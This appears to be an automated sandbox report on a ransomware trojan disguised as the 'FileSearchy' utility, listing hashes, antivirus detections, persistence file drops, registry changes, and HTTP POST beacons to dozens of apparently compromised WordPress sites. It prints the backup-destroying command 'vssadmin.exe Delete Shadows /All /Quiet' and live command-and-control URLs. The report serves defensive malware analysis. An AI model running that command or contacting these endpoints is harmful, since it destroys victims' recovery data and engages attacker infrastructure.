Analysis Date2015-10-28 07:47:39
MD5dbd822d32ae388f7f331f8260ac4eead
SHA1c4ed582710529904d1756afb113235888f90ed38

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3c2d12f1507969549ff57b50bb5b9342 sha1: e5d246f212ff74a1d0461a02a3a94d324380e3d3 size: 120320
Section.rdata md5: ebe8d195882207a9beedf0356a96a3dc sha1: a2e208dca488442d80c1ba906234692c671c1f70 size: 10240
Section.data md5: 78ab43f3fa71271cdefd2bc11b8d017f sha1: c5287f0d8963bcd1e800dce0822488cfafa31cf2 size: 4096
Section.rsrc md5: 438eac06861a4502fec0185ef5377d31 sha1: f85d56838fa7d7ed41d06d1534ef3f4da6e39e9a size: 109056
Timestamp2015-10-08 05:45:03
VersionLegalCopyright: Copyright (c) 2014 Midlinesoft
ProductVersion: 1.22
ProductName: FileSearchy
FileVersion: 1, 2, 2, 0
FileDescription: File search utility
PackerMicrosoft Visual C++ ?.?
PEhashec3e80098cfe040a4eb9c0506b0b645a2ebe8e63
IMPhash2001e00c523f6836b04d2393ff634251
AVCA (E-Trust Ino)no_virus
AVRisingno_virus
AVMcafeePacked-FW!DBD822D32AE3
AVAvira (antivir)TR/Crypt.Xpack.293544
AVTwisterno_virus
AVAd-AwareTrojan.Lethic.Gen.9
AVAlwil (avast)Evo-gen [Susp]
AVEset (nod32)Win32/Kryptik.DZUL
AVGrisoft (avg)Crypt_r.AAA
AVSymantecTrojan.Gen
AVFortinetPossibleThreat.VEX.99
AVBitDefenderTrojan.Lethic.Gen.9
AVK7Trojan ( 004d3b451 )
AVMicrosoft Security EssentialsTrojan:Win32/Bagsu!rfn
AVMicroWorld (escan)Trojan.Lethic.Gen.9
AVMalwareBytesBackdoor.Kasidet
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.Win32.Crypt
AVEmsisoftTrojan.Lethic.Gen.9
AVZillya!no_virus
AVKasperskyTrojan-Ransom.Win32.Cryptodef.zoy
AVTrend Microno_virus
AVCAT (quickheal)no_virus
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardTrojan.Lethic.Gen.9
AVArcabit (arcavir)Trojan.Lethic.Gen.9
AVClamAVno_virus
AVDr. WebTrojan.Encoder.514
AVF-SecureTrojan.Lethic.Gen.9

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Processvssadmin.exe Delete Shadows /All /Quiet
Creates Process-k netsvcs

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdefinitelymale.com
Winsock DNSpimss.nl
Winsock DNSdominamarketingporinternet.com
Winsock DNSmultylighting.com
Winsock DNSnationautopart.com
Winsock DNSaokvision.com
Winsock DNSdavidzollmusic.com
Winsock DNSdelgadillo.com.mx
Winsock DNSbisvel.com
Winsock DNSeclipsehair.com
Winsock DNScomerentenerife.com
Winsock DNSkhanggiaorder.com
Winsock DNSaok123.com
Winsock DNSvictoriaro.com
Winsock DNSkanooneservat.com
Winsock DNScurlmyip.com
Winsock DNSalmirot.com
Winsock DNShealthyairmasters.com
Winsock DNSbreastaugmentationnow.com
Winsock DNSbdcaindia.com
Winsock DNSlicenciaparaimprimirdinero.com
Winsock DNSelectjasonsmith.com
Winsock DNSvictoriaro.ru
Winsock DNSgjimnazicambridge.com
Winsock DNSwallpapers-hd.us
Winsock DNSla.nonpac.com
Winsock DNSjamiemeagher.com
Winsock DNSmyexternalip.com
Winsock DNSwaterdamagefortlauderdale.info
Winsock DNSantistatikzeminkaplama.com
Winsock DNSip-addr.es
Winsock DNSwaterdamgespokane.us
Winsock DNSclientes.autorepuestopalacios.com
Winsock DNShiringyou.us
Winsock DNSmetrshop.ru
Winsock DNSdemo.smointernational.com
Winsock DNSextraescolaresdilosport.com
Winsock DNSatlpvt.com
Winsock DNSenbuscade.org
Winsock DNSagsigh.com
Winsock DNSfurniturerowstores.com
Winsock DNSleathertabi.net
Winsock DNSleadershiptrifecta.com
Winsock DNSpcgamingkeyboards.com
Winsock DNSgenedillardart.com
Winsock DNSgettabletsnow.com
Winsock DNSmaestriaenalianzasestrategicas.com
Winsock DNSsuzuki.geringer.eu
Winsock DNShullukusagi.com
Winsock DNSelcoachingempresarial.com
Winsock DNShcows.com
Winsock DNSaster-toshiko.com
Winsock DNSbyteorders.com
Winsock DNSalbanianbakery.com
Winsock DNSguessthesportsteam.com
Winsock DNSdillardvideo.com
Winsock DNSdiputacion.ardinova.com
Winsock DNSkodehelp.com
Winsock DNSanxley.icodedark.com
Winsock DNSmeltemsatun.com
Winsock DNSikecotrina.com
Winsock DNSglutenfreecafegirl.com
Winsock DNSfootbe.ru

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSdemo.smointernational.com
Type: A
107.21.112.172
DNSlicenciaparaimprimirdinero.com
Type: A
198.245.61.209
DNSwaterdamgespokane.us
Type: A
192.69.235.197
DNSikecotrina.com
Type: A
81.169.145.95
DNSmultylighting.com
Type: A
192.254.233.64
DNSguessthesportsteam.com
Type: A
108.179.232.170
DNSla.nonpac.com
Type: A
192.185.16.153
DNSantistatikzeminkaplama.com
Type: A
94.73.144.9
DNSgeringer.eu
Type: A
178.238.210.164
DNSpcgamingkeyboards.com
Type: A
104.27.185.76
DNSpcgamingkeyboards.com
Type: A
104.27.184.76
DNSanxley.icodedark.com
Type: A
45.63.55.82
DNSclientes.autorepuestopalacios.com
Type: A
37.187.140.111
DNSgjimnazicambridge.com
Type: A
192.185.147.35
DNShullukusagi.com
Type: A
94.46.24.37
DNSaok123.com
Type: A
112.124.180.85
DNShiringyou.us
Type: A
192.185.24.200
DNSjamiemeagher.com
Type: A
204.13.11.31
DNSfootbe.ru
Type: A
5.101.153.11
DNSmaestriaenalianzasestrategicas.com
Type: A
198.57.149.47
DNSdominamarketingporinternet.com
Type: A
198.57.149.47
DNSleadershiptrifecta.com
Type: A
208.95.105.18
DNSbdcaindia.com
Type: A
192.185.4.18
DNSkanooneservat.com
Type: A
185.8.173.19
DNSenbuscade.org
Type: A
5.196.22.116
DNSagsigh.com
Type: A
103.21.59.28
DNSkhanggiaorder.com
Type: A
27.0.15.112
DNSextraescolaresdilosport.com
Type: A
192.185.16.189
DNShcows.com
Type: A
192.145.239.17
DNSwaterdamagefortlauderdale.info
Type: A
192.69.235.197
DNSatlpvt.com
Type: A
203.82.48.218
DNSmeltemsatun.com
Type: A
94.46.24.37
DNSbreastaugmentationnow.com
Type: A
50.87.144.185
DNSelcoachingempresarial.com
Type: A
198.57.149.47
DNShealthyairmasters.com
Type: A
66.96.160.134
DNSbisvel.com
Type: A
192.185.72.101
DNSdavidzollmusic.com
Type: A
208.95.105.18
DNSnationautopart.com
Type: A
192.145.239.17
DNScomerentenerife.com
Type: A
5.196.22.116
DNSwallpapers-hd.us
Type: A
104.28.18.8
DNSwallpapers-hd.us
Type: A
104.28.19.8
DNSalbanianbakery.com
Type: A
205.186.129.63
DNSdiputacion.ardinova.com
Type: A
37.187.140.111
DNSkodehelp.com
Type: A
104.131.74.68
DNSdefinitelymale.com
Type: A
64.74.223.42
DNSvictoriaro.ru
Type: A
5.101.152.31
DNSeclipsehair.com
Type: A
107.21.112.172
DNSvictoriaro.com
Type: A
5.101.152.31
DNSbyteorders.com
Type: A
208.95.105.18
DNSdelgadillo.com.mx
Type: A
198.57.149.47
DNSdillardvideo.com
Type: A
69.89.21.66
DNSaokvision.com
Type: A
112.124.180.85
DNSgettabletsnow.com
Type: A
50.87.144.185
DNSgenedillardart.com
Type: A
69.89.21.66
DNSalmirot.com
Type: A
5.196.22.116
DNSaster-toshiko.com
Type: A
49.212.235.27
DNSfurniturerowstores.com
Type: A
108.179.232.170
DNSglutenfreecafegirl.com
Type: A
192.185.35.62
DNSelectjasonsmith.com
Type: A
107.180.50.171
DNSsuzuki.geringer.eu
Type: A
DNSpimss.nl
Type: A
DNSmetrshop.ru
Type: A
DNSleathertabi.net
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://demo.smointernational.com/2.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://licenciaparaimprimirdinero.com/magaly/wp-admin/css/3.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://waterdamgespokane.us/wp-content/cache/supercache/waterdamgespokane.us/2014/08/1.php?j=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ikecotrina.com/wp-includes/theme-compat/3.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://multylighting.com/demo/wp-content/plugins/js_composer/assets/lib/bower/flexslider/4.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://guessthesportsteam.com/wp-content2/plugins/backupbuddy/views/settings/3.php?g=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://la.nonpac.com/img/3.php?k=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://antistatikzeminkaplama.com/wp-includes/theme-compat/1.php?p=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://suzuki.geringer.eu/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/5.php?z=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pcgamingkeyboards.com/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/5.php?b=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://anxley.icodedark.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/5.php?i=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://clientes.autorepuestopalacios.com/images/articulos/2.php?p=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gjimnazicambridge.com/OLD%20FILES/new-site/images/3.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hullukusagi.com/wp-includes/SimplePie/Net/3.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aok123.com/gsqgu/.f6e2634/1.php?e=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hiringyou.us/wp-content/plugins/js_composer/assets/lib/nivoslider/themes/light/4.php?w=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://jamiemeagher.com/nextgen-gallery/products/photocrati_nextgen/modules/wpcli/3.php?w=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://footbe.ru/wp-content/plugins/wp-super-popup/tiny_mce/themes/advanced/skins/o2k7/4.php?c=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://maestriaenalianzasestrategicas.com/wp-admin/user/3.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dominamarketingporinternet.com/wp-admin/user/2.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://leadershiptrifecta.com/3.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bdcaindia.com/wp-includes/Text/Diff/Engine/1.php?a=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kanooneservat.com/wp-content/plugins/js_composer/assets/lib/vcIconPicker/themes/grey-theme/5.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://enbuscade.org/documentos/2014/05/3.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://agsigh.com/wos/js/1.php?y=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://khanggiaorder.com/wp-includes/SimplePie/Cache/3.php?y=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://extraescolaresdilosport.com/wp-includes/SimplePie/Decode/HTML/3.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hcows.com/3.php?q=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://waterdamagefortlauderdale.info/wp-content/cache/1.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://atlpvt.com/wp-includes/Text/Diff/1.php?t=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://meltemsatun.com/wp-includes/SimplePie/Net/3.php?r=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://breastaugmentationnow.com/wp-content/plugins/contact-form-7/languages/2.php?l=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elcoachingempresarial.com/wp-admin/user/2.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://healthyairmasters.com/Demo_Preliminar_helths/wc-logs/3.php?f=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bisvel.com/media/media/css/1.php?p=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://davidzollmusic.com/.f622361ee0b4be53991dffe21b5a361f/b/a/2.php?k=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://nationautopart.com/1.php?z=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://comerentenerife.com/wp-content/plugins/post-ratings/templates/2.php?d=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://wallpapers-hd.us/wp-content/plugins/wordpress-seo/vendor/xrstf/composer-php52/lib/xrstf/4.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://albanianbakery.com/wiki/dll/1.php?j=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://diputacion.ardinova.com/wp-admin/images/screenshots/2.php?f=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kodehelp.com/wp-includes/certificates/3.php?h=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://definitelymale.com/wp-content/cache/supercache/definitelymale.com/2.php?z=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://victoriaro.ru/wp-content/plugins/tubepress/src/main/web/js/jscolor/4.php?w=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eclipsehair.com/2.php?r=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://victoriaro.com/wp-content/themes/hueman/option-tree/assets/js/vendor/jquery/4.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://byteorders.com/2.php?t=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://delgadillo.com.mx/himnofjr/2.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dillardvideo.com/wp-admin/network/2.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aokvision.com/gsqgu/.f6e2634/1.php?k=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gettabletsnow.com/wp-content/pep-vn/static-vars/3.php?b=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://genedillardart.com/wp-admin/network/3.php?d=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://almirot.com/wp-content/uploads/1.php?i=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aster-toshiko.com/parts/org/1.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://furniturerowstores.com/wp-content/plugins/backupbuddy/backupbuddy/views/settings/3.php?i=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glutenfreecafegirl.com/wp-admin/user/3.php?l=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://electjasonsmith.com/wp-content/plugins/wp-hide-post/2.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 107.21.112.172:80
Flows TCP192.168.1.1:1035 ➝ 198.245.61.209:80
Flows TCP192.168.1.1:1036 ➝ 192.69.235.197:80
Flows TCP192.168.1.1:1037 ➝ 81.169.145.95:80
Flows TCP192.168.1.1:1038 ➝ 192.254.233.64:80
Flows TCP192.168.1.1:1039 ➝ 108.179.232.170:80
Flows TCP192.168.1.1:1040 ➝ 192.185.16.153:80
Flows TCP192.168.1.1:1041 ➝ 94.73.144.9:80
Flows TCP192.168.1.1:1042 ➝ 178.238.210.164:80
Flows TCP192.168.1.1:1043 ➝ 104.27.185.76:80
Flows TCP192.168.1.1:1044 ➝ 45.63.55.82:80
Flows TCP192.168.1.1:1045 ➝ 37.187.140.111:80
Flows TCP192.168.1.1:1046 ➝ 192.185.147.35:80
Flows TCP192.168.1.1:1047 ➝ 94.46.24.37:80
Flows TCP192.168.1.1:1048 ➝ 112.124.180.85:80
Flows TCP192.168.1.1:1049 ➝ 192.185.24.200:80
Flows TCP192.168.1.1:1050 ➝ 204.13.11.31:80
Flows TCP192.168.1.1:1051 ➝ 5.101.153.11:80
Flows TCP192.168.1.1:1052 ➝ 198.57.149.47:80
Flows TCP192.168.1.1:1053 ➝ 198.57.149.47:80
Flows TCP192.168.1.1:1054 ➝ 208.95.105.18:80
Flows TCP192.168.1.1:1055 ➝ 192.185.4.18:80
Flows TCP192.168.1.1:1056 ➝ 185.8.173.19:80
Flows TCP192.168.1.1:1057 ➝ 5.196.22.116:80
Flows TCP192.168.1.1:1058 ➝ 103.21.59.28:80
Flows TCP192.168.1.1:1059 ➝ 27.0.15.112:80
Flows TCP192.168.1.1:1060 ➝ 192.185.16.189:80
Flows TCP192.168.1.1:1061 ➝ 192.145.239.17:80
Flows TCP192.168.1.1:1062 ➝ 192.69.235.197:80
Flows TCP192.168.1.1:1063 ➝ 203.82.48.218:80
Flows TCP192.168.1.1:1064 ➝ 94.46.24.37:80
Flows TCP192.168.1.1:1065 ➝ 50.87.144.185:80
Flows TCP192.168.1.1:1066 ➝ 198.57.149.47:80
Flows TCP192.168.1.1:1067 ➝ 66.96.160.134:80
Flows TCP192.168.1.1:1068 ➝ 192.185.72.101:80
Flows TCP192.168.1.1:1069 ➝ 208.95.105.18:80
Flows TCP192.168.1.1:1070 ➝ 192.145.239.17:80
Flows TCP192.168.1.1:1071 ➝ 5.196.22.116:80
Flows TCP192.168.1.1:1072 ➝ 104.28.18.8:80
Flows TCP192.168.1.1:1073 ➝ 205.186.129.63:80
Flows TCP192.168.1.1:1074 ➝ 37.187.140.111:80
Flows TCP192.168.1.1:1075 ➝ 104.131.74.68:80
Flows TCP192.168.1.1:1076 ➝ 64.74.223.42:80
Flows TCP192.168.1.1:1077 ➝ 5.101.152.31:80
Flows TCP192.168.1.1:1078 ➝ 107.21.112.172:80
Flows TCP192.168.1.1:1079 ➝ 5.101.152.31:80
Flows TCP192.168.1.1:1080 ➝ 208.95.105.18:80
Flows TCP192.168.1.1:1081 ➝ 198.57.149.47:80
Flows TCP192.168.1.1:1082 ➝ 69.89.21.66:80
Flows TCP192.168.1.1:1083 ➝ 112.124.180.85:80
Flows TCP192.168.1.1:1084 ➝ 50.87.144.185:80
Flows TCP192.168.1.1:1085 ➝ 69.89.21.66:80
Flows TCP192.168.1.1:1086 ➝ 5.196.22.116:80
Flows TCP192.168.1.1:1087 ➝ 49.212.235.27:80
Flows TCP192.168.1.1:1088 ➝ 108.179.232.170:80
Flows TCP192.168.1.1:1089 ➝ 192.185.35.62:80
Flows TCP192.168.1.1:1090 ➝ 107.180.50.171:80

Raw Pcap

Strings